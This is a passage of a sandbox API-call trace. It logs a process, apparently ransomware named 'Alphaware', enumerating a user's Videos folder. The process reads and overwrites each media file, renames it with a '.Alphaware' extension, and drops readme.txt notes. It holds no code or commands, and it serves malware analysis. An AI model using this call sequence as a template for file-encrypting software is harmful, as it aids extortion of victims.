"c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.609] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1242580, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdf4a9e30, ftLastAccessTime.dwHighDateTime=0x1d97679, ftLastWriteTime.dwLowDateTime=0x870261e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x150e0)) returned 1 [0088.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.610] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zdm5mb5UMA.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zdm5mb5uma.avi.alphaware")) returned 1 [0088.610] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf", dwFileAttributes=0x80) returned 1 [0088.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf"), fInfoLevelId=0x0, lpFileInformation=0x253bed0 | out: lpFileInformation=0x253bed0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2e87f5c0, ftCreationTime.dwHighDateTime=0x1d972f0, ftLastAccessTime.dwLowDateTime=0x7493f420, ftLastAccessTime.dwHighDateTime=0x1d974bb, ftLastWriteTime.dwLowDateTime=0x7493f420, ftLastWriteTime.dwHighDateTime=0x1d974bb, nFileSizeHigh=0x0, nFileSizeLow=0xfb6c)) returned 1 [0088.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.611] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.611] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.611] ReadFile (in: hFile=0x250, lpBuffer=0x253c158, nNumberOfBytesToRead=0xfb6c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x253c158*, lpNumberOfBytesRead=0x23eb38*=0xfb6c, lpOverlapped=0x0) returned 1 [0088.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.634] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e87f5c0, ftCreationTime.dwHighDateTime=0x1d972f0, ftLastAccessTime.dwLowDateTime=0x7493f420, ftLastAccessTime.dwHighDateTime=0x1d974bb, ftLastWriteTime.dwLowDateTime=0x870724a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15008)) returned 1 [0088.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.638] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\zOe1LTkImCuAAhrwbXf9.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zoe1ltkimcuaahrwbxf9.swf.alphaware")) returned 1 [0088.639] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4", dwFileAttributes=0x80) returned 1 [0088.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.639] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4"), fInfoLevelId=0x0, lpFileInformation=0x2413738 | out: lpFileInformation=0x2413738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf2cc1cf0, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0x5aac5550, ftLastAccessTime.dwHighDateTime=0x1d975ee, ftLastWriteTime.dwLowDateTime=0x5aac5550, ftLastWriteTime.dwHighDateTime=0x1d975ee, nFileSizeHigh=0x0, nFileSizeLow=0x162a3)) returned 1 [0088.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.639] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.639] ReadFile (in: hFile=0x250, lpBuffer=0x129e9990, nNumberOfBytesToRead=0x162a3, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x129e9990*, lpNumberOfBytesRead=0x23eb38*=0x162a3, lpOverlapped=0x0) returned 1 [0088.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.671] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cc1cf0, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0x5aac5550, ftLastAccessTime.dwHighDateTime=0x1d975ee, ftLastWriteTime.dwLowDateTime=0x870e48c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d9b4)) returned 1 [0088.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.676] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\ZShqFxkOqd6c5.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\zshqfxkoqd6c5.mp4.alphaware")) returned 1 [0088.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.677] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x870e48c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x870e48c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe21070, ftCreationTime.dwHighDateTime=0x1d96ebd, ftLastAccessTime.dwLowDateTime=0xd2cdd8f0, ftLastAccessTime.dwHighDateTime=0x1d9731a, ftLastWriteTime.dwLowDateTime=0x86f1b840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14d88, dwReserved0=0x0, dwReserved1=0x0, cFileName="0vDMTR303fbv.avi.Alphaware", cAlternateFileName="0VDMTR~1.ALP")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb89aa130, ftCreationTime.dwHighDateTime=0x1d97297, ftLastAccessTime.dwLowDateTime=0x85bd4df0, ftLastAccessTime.dwHighDateTime=0x1d972ea, ftLastWriteTime.dwLowDateTime=0x86f67b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cb48, dwReserved0=0x0, dwReserved1=0x0, cFileName="87P5PxsKOq.avi.Alphaware", cAlternateFileName="87P5PX~1.ALP")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe51260, ftCreationTime.dwHighDateTime=0x1d96ee1, ftLastAccessTime.dwLowDateTime=0xa5896d20, ftLastAccessTime.dwHighDateTime=0x1d9704d, ftLastWriteTime.dwLowDateTime=0x86fb3dc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc2c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="b73Vtl-2.mp4.Alphaware", cAlternateFileName="B73VTL~1.ALP")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x159a9570, ftCreationTime.dwHighDateTime=0x1d97423, ftLastAccessTime.dwLowDateTime=0x23d43fe0, ftLastAccessTime.dwHighDateTime=0x1d97664, ftLastWriteTime.dwLowDateTime=0x23d43fe0, ftLastWriteTime.dwHighDateTime=0x1d97664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bIeMKBNSsvf5WRB", cAlternateFileName="BIEMKB~1")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x87000080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedc0e0f0, ftCreationTime.dwHighDateTime=0x1d9726e, ftLastAccessTime.dwLowDateTime=0x96bfb180, ftLastAccessTime.dwHighDateTime=0x1d9730b, ftLastWriteTime.dwLowDateTime=0x96bfb180, ftLastWriteTime.dwHighDateTime=0x1d9730b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hWvMFQJJJ", cAlternateFileName="HWVMFQ~1")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa07d4070, ftCreationTime.dwHighDateTime=0x1d96efb, ftLastAccessTime.dwLowDateTime=0xb369e3e0, ftLastAccessTime.dwHighDateTime=0x1d97366, ftLastWriteTime.dwLowDateTime=0xb369e3e0, ftLastWriteTime.dwHighDateTime=0x1d97366, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvuGC2saBZF J", cAlternateFileName="JVUGC2~1")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="oaG6wqo", cAlternateFileName="")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f1b840, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86f1b840, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86f1b840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.678] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1242580, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdf4a9e30, ftLastAccessTime.dwHighDateTime=0x1d97679, ftLastWriteTime.dwLowDateTime=0x870261e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x150e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zdm5mb5UMA.avi.Alphaware", cAlternateFileName="ZDM5MB~1.ALP")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e87f5c0, ftCreationTime.dwHighDateTime=0x1d972f0, ftLastAccessTime.dwLowDateTime=0x7493f420, ftLastAccessTime.dwHighDateTime=0x1d974bb, ftLastWriteTime.dwLowDateTime=0x870724a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15008, dwReserved0=0x0, dwReserved1=0x0, cFileName="zOe1LTkImCuAAhrwbXf9.swf.Alphaware", cAlternateFileName="ZOE1LT~1.ALP")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cc1cf0, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0x5aac5550, ftLastAccessTime.dwHighDateTime=0x1d975ee, ftLastWriteTime.dwLowDateTime=0x870e48c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d9b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZShqFxkOqd6c5.mp4.Alphaware", cAlternateFileName="ZSHQFX~1.ALP")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc15bca60, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xce25a650, ftLastAccessTime.dwHighDateTime=0x1d974ca, ftLastWriteTime.dwLowDateTime=0xce25a650, ftLastWriteTime.dwHighDateTime=0x1d974ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zu2JIWj2WW", cAlternateFileName="ZU2JIW~1")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x159a9570, ftCreationTime.dwHighDateTime=0x1d97423, ftLastAccessTime.dwLowDateTime=0x23d43fe0, ftLastAccessTime.dwHighDateTime=0x1d97664, ftLastWriteTime.dwLowDateTime=0x23d43fe0, ftLastWriteTime.dwHighDateTime=0x1d97664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a2fdd0, ftCreationTime.dwHighDateTime=0x1d9754b, ftLastAccessTime.dwLowDateTime=0x2ce3d950, ftLastAccessTime.dwHighDateTime=0x1d9757a, ftLastWriteTime.dwLowDateTime=0x2ce3d950, ftLastWriteTime.dwHighDateTime=0x1d9757a, nFileSizeHigh=0x0, nFileSizeLow=0xd371, dwReserved0=0x0, dwReserved1=0x0, cFileName="TVHtwFsg.flv", cAlternateFileName="")) returned 1 [0088.679] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.680] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv", dwFileAttributes=0x80) returned 1 [0088.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv"), fInfoLevelId=0x0, lpFileInformation=0x24164b8 | out: lpFileInformation=0x24164b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x20a2fdd0, ftCreationTime.dwHighDateTime=0x1d9754b, ftLastAccessTime.dwLowDateTime=0x2ce3d950, ftLastAccessTime.dwHighDateTime=0x1d9757a, ftLastWriteTime.dwLowDateTime=0x2ce3d950, ftLastWriteTime.dwHighDateTime=0x1d9757a, nFileSizeHigh=0x0, nFileSizeLow=0xd371)) returned 1 [0088.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.680] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.680] ReadFile (in: hFile=0x250, lpBuffer=0x2416720, nNumberOfBytesToRead=0xd371, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2416720*, lpNumberOfBytesRead=0x23ea98*=0xd371, lpOverlapped=0x0) returned 1 [0088.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.700] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a2fdd0, ftCreationTime.dwHighDateTime=0x1d9754b, ftLastAccessTime.dwLowDateTime=0x2ce3d950, ftLastAccessTime.dwHighDateTime=0x1d9757a, ftLastWriteTime.dwLowDateTime=0x8710aa20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11ac8)) returned 1 [0088.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.704] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\TVHtwFsg.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\tvhtwfsg.flv.alphaware")) returned 1 [0088.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0088.705] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\bIeMKBNSsvf5WRB\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\biemkbnssvf5wrb\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0088.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.706] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x159a9570, ftCreationTime.dwHighDateTime=0x1d97423, ftLastAccessTime.dwLowDateTime=0x87130b80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87130b80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87130b80, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x87130b80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87130b80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a2fdd0, ftCreationTime.dwHighDateTime=0x1d9754b, ftLastAccessTime.dwLowDateTime=0x2ce3d950, ftLastAccessTime.dwHighDateTime=0x1d9757a, ftLastWriteTime.dwLowDateTime=0x8710aa20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TVHtwFsg.flv.Alphaware", cAlternateFileName="TVHTWF~1.ALP")) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a2fdd0, ftCreationTime.dwHighDateTime=0x1d9754b, ftLastAccessTime.dwLowDateTime=0x2ce3d950, ftLastAccessTime.dwHighDateTime=0x1d9757a, ftLastWriteTime.dwLowDateTime=0x8710aa20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TVHtwFsg.flv.Alphaware", cAlternateFileName="TVHTWF~1.ALP")) returned 0 [0088.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.707] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedc0e0f0, ftCreationTime.dwHighDateTime=0x1d9726e, ftLastAccessTime.dwLowDateTime=0x96bfb180, ftLastAccessTime.dwHighDateTime=0x1d9730b, ftLastWriteTime.dwLowDateTime=0x96bfb180, ftLastWriteTime.dwHighDateTime=0x1d9730b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 